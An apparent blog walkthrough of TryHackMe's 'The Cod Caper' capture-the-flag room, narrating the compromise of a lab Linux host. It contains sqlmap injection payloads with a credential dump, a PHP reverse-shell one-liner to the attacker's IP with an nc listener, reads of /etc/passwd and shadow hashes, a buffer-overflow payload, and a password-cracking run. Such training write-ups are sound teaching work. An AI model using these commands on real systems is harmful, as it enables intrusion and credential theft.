In this walk through, we will be going through the The Cod Caper room from Tryhackme. In this room, we will go through the journey of infiltrating and exploiting a Linux system. So without any delay, let’s get started.
Table of Contents
Machine Info:
Title | The Caping of Cod |
IPaddress | 10.10.126.161 |
Difficulty | Easy |
Objective | A guided room taking you through infiltrating and exploiting a Linux system. |
Task 1 – Intro
Task 2 – Host Enumeration
The first step is to see what ports and services are running on the target machine.
Recommended Tool – nmap:
Useful flags:
wh1terose@fsociety:~$ sudo nmap -sS -sV -sC 10.10.126.161 Nmap scan report for 10.10.126.161 Host is up (0.26s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 6d:2c:40:1b:6c:15:7c:fc:bf:9b:55:22:61:2a:56:fc (RSA) | 256 ff:89:32:98:f4:77:9c:09:39:f5:af:4a:4f:08:d6:f5 (ECDSA) |_ 256 89:92:63:e7:1d:2b:3a:af:6c:f9:39:56:5b:55:7e:f9 (ED25519) -- snipped -- 53/tcp filtered domain 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works --snipped --
Question 1 – How many ports are open on the target machine?
2
Question 2 – What is the http-title of the web server?
Apache2 Ubuntu Default Page: It works
Question 3 – What version is the ssh service?
OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Question 4 – What is the version of the web server?
Apache/2.4.18
Task 3 – Web Enumeration
Since the only services running are SSH and Apache, it is safe to assume that we should check out the web server first for possible vulnerabilities. One of the first things to do is to see what pages are available to access on the web server.
Recommended tool: gobuster
Useful flags:
wh1terose@fsociety:~$ gobuster dir -u http://10.10.126.161/ -w ~/Desktop/Wordlist/big.txt -x php,txt,html =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.126.161/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/wh1terose/Desktop/Wordlist/big.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: html,php,txt [+] Timeout: 10s =============================================================== 2023/05/09 22:00:07 Starting gobuster in directory enumeration mode =============================================================== /.htaccess.txt (Status: 403) [Size: 278] /.htpasswd.php (Status: 403) [Size: 278] /.htaccess.html (Status: 403) [Size: 278] /.htpasswd.txt (Status: 403) [Size: 278] /.htaccess (Status: 403) [Size: 278] /.htpasswd (Status: 403) [Size: 278] /.htaccess.php (Status: 403) [Size: 278] /.htpasswd.html (Status: 403) [Size: 278] /administrator.php (Status: 200) [Size: 409] Progress: 13592 / 81912 (16.59%)
Question 1 – What is the name of the important file on the server?
administrator.php
Task 4 – Web Exploitation
The admin page seems to give us a login form. In situations like this it is always worth it to check for “low-hanging fruit”. In the case of login forms one of the first things to check for is SQL Injection.
Recommended Tool: sqlmap
wh1terose@fsociety:~/Tools/sqlmap-dev$ python3 sqlmap.py -u http://10.10.126.161/administrator.php --forms --dump ___ __H__ ___ ___[,]_____ ___ ___ {1.6.11.10#dev} |_ -| . [,] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 22:37:09 /2023-05-09/ [22:37:09] [INFO] testing connection to the target URL [22:37:10] [INFO] searching for forms [1/1] Form: POST http://10.10.126.161/administrator.php POST data: username=&password= do you want to test this form? [Y/n/q] Y Edit POST data [default: username=&password=] (Warning: blank fields detected): do you want to fill blank fields with random values? [Y/n] Y [22:38:23] [INFO] resuming back-end DBMS 'mysql' [22:38:23] [INFO] using '/home/wh1terose/.sqlmap/output/results-05092023_1038pm.csv' as the CSV results file in multiple targets mode sqlmap resumed the following injection point(s) from stored session: --- Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: username=dYgw' RLIKE (SELECT (CASE WHEN (7626=7626) THEN 0x64596777 ELSE 0x28 END))-- YFJq&password= Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: username=dYgw' OR (SELECT 3854 FROM(SELECT COUNT(*),CONCAT(0x71707a7a71,(SELECT (ELT(3854=3854,1))),0x717a6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TGXB&password= Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: username=dYgw' OR (SELECT 2064 FROM (SELECT(SLEEP(5)))ZgLa)-- YFbf&password= --- do you want to exploit this SQL injection? [Y/n] [22:39:07] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0 [22:39:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [22:39:07] [INFO] fetching current database [22:39:07] [INFO] resumed: 'users' [22:39:07] [INFO] fetching tables for database: 'users' [22:39:08] [INFO] retrieved: 'users' [22:39:08] [INFO] fetching columns for table 'users' in database 'users' [22:39:09] [INFO] retrieved: 'username' [22:39:09] [INFO] retrieved: 'varchar(100)' [22:39:10] [INFO] retrieved: 'password' [22:39:12] [INFO] retrieved: 'varchar(100)' [22:39:12] [INFO] fetching entries for table 'users' in database 'users' [22:39:12] [INFO] retrieved: 'secretpass' [22:39:12] [INFO] retrieved: 'pingudad' Database: users Table: users [1 entry] +------------+----------+ | password | username | +------------+----------+ | secretpass | pingudad | +------------+----------+ [22:39:12] [INFO] table 'users.users' dumped to CSV file '/home/wh1terose/.sqlmap/output/10.10.126.161/dump/users/users.csv' [22:39:12] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/wh1terose/.sqlmap/output/results-05092023_1038pm.csv' [*] ending @ 22:39:12 /2023-05-09/
Question 1 – What is the admin username?
pingudad
Question 2 – What is the admin password?
secretpass
Question 3 – How many forms of SQLI is the form vulnerable to?
3
Task 5 – Command Execution
It seems we have gained the ability to run commands! Since this is my old PC, I should still have a user account! Let’s run a few test commands, and then try to gain access!
Method 1: nc Reverse shell:
This machine has been outfitted with nc, a tool that allows you to make and receive connections and send data. It is one of the most popular tools to get a reverse shell. Some great places to find reverse shell payloads are highoncoffee and Pentestmonkey
After this you will have to do some additional enumeration to find pingu’s ssh key, or hidden password
Method 2: Hidden passwords:
Assuming my father hasn’t modified since he took over my old PC, I should still have my hidden password stored somewhere,I don’t recall though so you’ll have to find it! find
is the recommended tool here as it allows you to search for which files a user specifically owns.
php -r '$sock=fsockopen("10.18.11.103",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
nc -lvnp 4444
wh1terose@fsociety:~/Tools/sqlmap-dev$ nc -lvnp 4444 Listening on 0.0.0.0 4444 Connection received on 10.10.126.161 36054 /bin/sh: 0: can't access tty; job control turned off $ ls 2591c98b70119fe624898b1e424b5e91.php administrator.php index.html $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false papa:x:1000:1000:qaa:/home/papa:/bin/bash mysql:x:108:116:MySQL Server,,,:/nonexistent:/bin/false sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin pingu:x:1002:1002::/home/pingu:/bin/bash $ find / -type f -name pass 2> /dev/null /var/hidden/pass $ cat /var/hidden/pass pinguapingu $
Task 6 – LinEnum
LinEnum is a bash script that searches for possible ways to priv esc. It is incredibly popular due to the sheer amount of possible methods that it checks for, and often times Linenum is one of the first things to try when you get shell access.
Methods to get Linenum on the system
Method 1: SCP
Since you have ssh access on the machine you can use SCP to copy files over. In the case of Linenum you would run scp {path to linenum} {user}@{host}:{path}. Example: scp /opt/LinEnum.sh [email protected]:/tmp
would put LinEnum in /tmp.
Method 2: SimpleHTTPServer
SimpleHTTPServer is a module that hosts a basic webserver on your host machine. Assuming the machine you compromised has a way to remotely download files, you can host LinEnum and download it.
Note: There are numerous ways to do this and the two listed above are just my personal favorites.
Once You have LinEnum on the system, its as simple as running it and looking at the output above once it finishes.
Question 1 – What is the interesting path of the interesting suid file
/opt/secret/root
Task 7 – pwndbg
Luckily for us I was able to snag a copy of the source code from my dad’s flash drive
#include "unistd.h" #include "stdio.h" #include "stdlib.h" void shell() { setuid(1000); setgid(1000); system("cat /var/backups/shadow.bak"); } void get_input() { char buffer[32]; scanf("%s",buffer); } int main() { get_input(); }`
The SUID file seems to expect 32 characters of input, and then immediately exits. This seems to warrant further investigation. Luckily I was practicing binary exploitation back when I was using that PC, so I have tools preinstalled to examine. One of those tools is pwndbg, a plugin for GDB which allows you to better examine binary files.
Run gdb /opt/secret/root
and you should see a screen similar to this
This means that pwndbg has successfully been initialized. The next step is to test if anything happens when you send more then 32 characters. To do this type r < <(cyclic 50)
, that command runs the program and provides 50 characters worth of “cyclic” input.
Cyclic input goes like this: “aaaaaaaabaaacaaadaaaeaaaf” etc. Because it’s in this “cyclic” format, it allows us to better understand the control we have over certain registers, for reasons you are about to see.
Once you run that command you should see something similar to this screen
Now this is where some knowledge of assembly helps. It seems that in this case we’re able to overwrite EIP, which is known as the instruction pointer. The instruction pointer tells the program which bit of memory to execute next, which in an ideal case would have the program run normally. However, since we’re able to overwrite it, we can theoretically execute any part of the program at any time.
Recall the shell function from the source code, if we can overwrite EIP to point to the shell function, we can cause it to execute. This is also where the benefits of cyclic input show themselves. Recall that cyclic input goes in 4 character/byte sequences, meaning we’re able to calculate exactly how many characters we need to provide before we can overwrite EIP.
Luckily cyclic provides this functionality with the -l flag, running cyclic -l {fault address} will tell us exactly how many characters we need to provide we can overwrite EIP.
Running cyclic -l 0x6161616c
outputs 44, meaning we can overwrite EIP once we provide 44 characters of input.
That’s all we needed for pre-explotation!
Question 1 – Read the above 🙂
Done
Task 8 – Binary-Exploitaion: Manually
Question 1 – Woohoo!
Done
```bash (gdb) disassemble shell Dump of assembler code for function shell: 0x080484cb <+0>: push %ebp 0x080484cc <+1>: mov %esp,%ebp 0x080484ce <+3>: sub $0x8,%esp 0x080484d1 <+6>: sub $0xc,%esp 0x080484d4 <+9>: push $0x3e8 0x080484d9 <+14>: call 0x80483a0 <setuid@plt> 0x080484de <+19>: add $0x10,%esp 0x080484e1 <+22>: sub $0xc,%esp 0x080484e4 <+25>: push $0x3e8 0x080484e9 <+30>: call 0x8048370 <setgid@plt> 0x080484ee <+35>: add $0x10,%esp 0x080484f1 <+38>: sub $0xc,%esp 0x080484f4 <+41>: push $0x80485d0 0x080484f9 <+46>: call 0x8048380 <system@plt> 0x080484fe <+51>: add $0x10,%esp 0x08048501 <+54>: nop 0x08048502 <+55>: leave 0x08048503 <+56>: ret End of assembler dump. $ python -c 'print "A"*44 + "\xcb\x84\x04\x08"' | /opt/secret/root root:$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.:18277:0:99999:7::: daemon:*:17953:0:99999:7::: bin:*:17953:0:99999:7::: sys:*:17953:0:99999:7::: sync:*:17953:0:99999:7::: games:*:17953:0:99999:7::: man:*:17953:0:99999:7::: lp:*:17953:0:99999:7::: mail:*:17953:0:99999:7::: news:*:17953:0:99999:7::: uucp:*:17953:0:99999:7::: proxy:*:17953:0:99999:7::: www-data:*:17953:0:99999:7::: backup:*:17953:0:99999:7::: list:*:17953:0:99999:7::: irc:*:17953:0:99999:7::: gnats:*:17953:0:99999:7::: nobody:*:17953:0:99999:7::: systemd-timesync:*:17953:0:99999:7::: systemd-network:*:17953:0:99999:7::: systemd-resolve:*:17953:0:99999:7::: systemd-bus-proxy:*:17953:0:99999:7::: syslog:*:17953:0:99999:7::: _apt:*:17953:0:99999:7::: messagebus:*:18277:0:99999:7::: uuidd:*:18277:0:99999:7::: papa:$1$ORU43el1$tgY7epqx64xDbXvvaSEnu.:18277:0:99999:7::: Segmentation fault
Task 9 – Binary Exploitation: The pwntools way
Question 1 – Even more woohoo!
Done
Task 10 – Finishing the job
Now that we have the password hashes, we can crack them and get the root password! Recall from the previous outputs that our root password hash is “$6$rFK4s/vE$zkh2/RBiRZ746OW3/Q/zqTRVfrfYJfFjFc2/q.oYtoF1KglS3YWoExtT3cvA3ml9UtDS8PFzCk902AsWx00Ck.
“.
Luckily hashcat supports cracking linux password hashes. You can find a list of hashcat modes here and rockyou.txt(a popular wordlist) here (if you don’t already have it on your system)
Recommended tool – Hashcat:
Usage: hashcat {flags} {hashfile} {wordlist}
wh1terose@fsociety:~/CTF/TryHackme/The COD caper$ ~/Tools/john/run/john hash Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 8 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst Enabling duplicate candidate password suppressor love2fish (?) 1g 0:00:00:14 DONE 2/3 (2023-05-09 23:41) 0.06868g/s 8158p/s 8158c/s 8158C/s 652652..ilovemel Use the "--show" option to display all of the cracked passwords reliably Session completed.
Question 1 – What is the root password!
love2fish
Task 11 – Thank you!
Also Read: Tryhackme – Sudo Security Bypass
So that was “The Cod Caper” for you. In this room, we have learned how to infiltrate and exploit a Linux system. We started with basic host enumeration with nmap. Then performed some directory bruteforcing and web enumeration with gobuster. Moving on, we exploited a SQL injection vulnerability and dumped the username and password combo. Further, we exploited a command injection vulnerability and got our initial shell access with netcat. Moving ahead to privilege escalation, we used Linenum, script. At last, we looked into some binary exploitation with Pwntools, pwndgb and gdb. On that note, i will take your leave but stay tuned for the next one and till then, remember to “Hack the planet”.